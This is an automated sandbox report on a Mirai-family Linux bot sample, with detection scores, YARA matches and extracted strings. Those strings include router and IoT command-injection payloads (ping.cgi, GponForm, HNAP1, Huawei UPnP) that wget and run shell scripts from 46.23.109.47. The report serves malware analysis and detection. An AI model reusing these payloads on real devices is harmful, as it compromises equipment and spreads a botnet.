Linux Analysis Report
MUuRNNXESN

Overview

General Information

Sample Name: MUuRNNXESN
Analysis ID: 679632
MD5: 99edb6a756fdffce917217e1b5804ddf
SHA1: 22d88f2e2e1e19e78fda1a4963d74117c1a076c2
SHA256: 53daedfc1abe3477c33ecdedb8a8243fabcd5e5bb6bff55e8da14dc75fdc7efb
Tags: 32elfmirairenesas
Infos:

Detection

Mirai
Score: 64
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara signature match
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection

barindex
Source: MUuRNNXESN Avira: detected
Source: MUuRNNXESN Virustotal: Detection: 50% Perma Link
Source: MUuRNNXESN ReversingLabs: Detection: 52%
Source: /tmp/MUuRNNXESN (PID: 6230) Socket: 127.0.0.1::44455 Jump to behavior
Source: MUuRNNXESN String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: MUuRNNXESN String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: MUuRNNXESN String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: MUuRNNXESN String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: MUuRNNXESN String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: MUuRNNXESN String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: MUuRNNXESN String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: MUuRNNXESN String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: MUuRNNXESN String found in binary or memory: http://purenetworks.com/HNAP1/
Source: MUuRNNXESN String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: MUuRNNXESN String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: MUuRNNXESN, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6230.1.00007f4db442c000.00007f4db442d000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6233.1.00007f4db4400000.00007f4db441b000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6230.1.00007f4db4400000.00007f4db441b000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6233.1.00007f4db442c000.00007f4db442d000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: Initial sample Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+*;sh+Jaws.sh HTTP/1.1
Source: Initial sample Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample Potential command found: GET /index.php?s=/index/hink
Source: ELF static info symbol of initial sample .symtab present: no
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
Source: classification engine Classification label: mal64.troj.lin@0/0@0/0
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6235/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1582/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2033/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2275/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/3088/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6191/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6192/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1612/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1579/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1699/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1335/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1698/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2028/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1334/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1576/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2302/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/3236/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2025/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2146/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/910/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/912/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/517/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/759/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2307/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/918/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6241/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6243/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6245/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6247/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6246/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1594/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2285/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2281/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1349/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1623/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/761/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1622/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/884/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1983/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2038/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1344/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1465/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1586/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1463/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2156/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/800/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6238/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/801/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1629/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6239/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1627/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1900/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/4470/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6254/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6253/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6256/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6255/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/4354/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/3021/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/491/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2294/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2050/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1877/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/772/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1633/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1599/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1632/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/774/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1477/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/654/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/896/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1476/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1872/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2048/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/655/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1475/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2289/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/656/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/777/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/657/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/658/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/4467/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6248/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/4468/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/4469/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/419/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/936/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1639/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/4503/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1638/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2208/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2180/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6263/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6264/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1809/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1494/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1890/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2063/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/2062/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/6261/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1888/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1886/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/420/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/1489/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6232) File opened: /proc/785/exe Jump to behavior
Source: /tmp/MUuRNNXESN (PID: 6230) Queries kernel information via 'uname': Jump to behavior
Source: MUuRNNXESN, 6230.1.00007ffe4dbd5000.00007ffe4dbf6000.rw-.sdmp, MUuRNNXESN, 6233.1.00007ffe4dbd5000.00007ffe4dbf6000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-sh4/tmp/MUuRNNXESNSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/MUuRNNXESN
Source: MUuRNNXESN, 6230.1.00007ffe4dbd5000.00007ffe4dbf6000.rw-.sdmp, MUuRNNXESN, 6233.1.00007ffe4dbd5000.00007ffe4dbf6000.rw-.sdmp Binary or memory string: /usr/bin/qemu-sh4
Source: MUuRNNXESN, 6230.1.000055ec0c78c000.000055ec0c7ef000.rw-.sdmp, MUuRNNXESN, 6233.1.000055ec0c78c000.000055ec0c7ef000.rw-.sdmp Binary or memory string: U5!/etc/qemu-binfmt/sh4
Source: MUuRNNXESN, 6230.1.000055ec0c78c000.000055ec0c7ef000.rw-.sdmp, MUuRNNXESN, 6233.1.000055ec0c78c000.000055ec0c7ef000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/sh4

Stealing of Sensitive Information

barindex
Source: Yara match File source: MUuRNNXESN, type: SAMPLE
Source: Yara match File source: 6233.1.00007f4db4400000.00007f4db441b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6230.1.00007f4db4400000.00007f4db441b000.r-x.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: Yara match File source: MUuRNNXESN, type: SAMPLE
Source: Yara match File source: 6233.1.00007f4db4400000.00007f4db441b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6230.1.00007f4db4400000.00007f4db441b000.r-x.sdmp, type: MEMORY
No contacted IP infos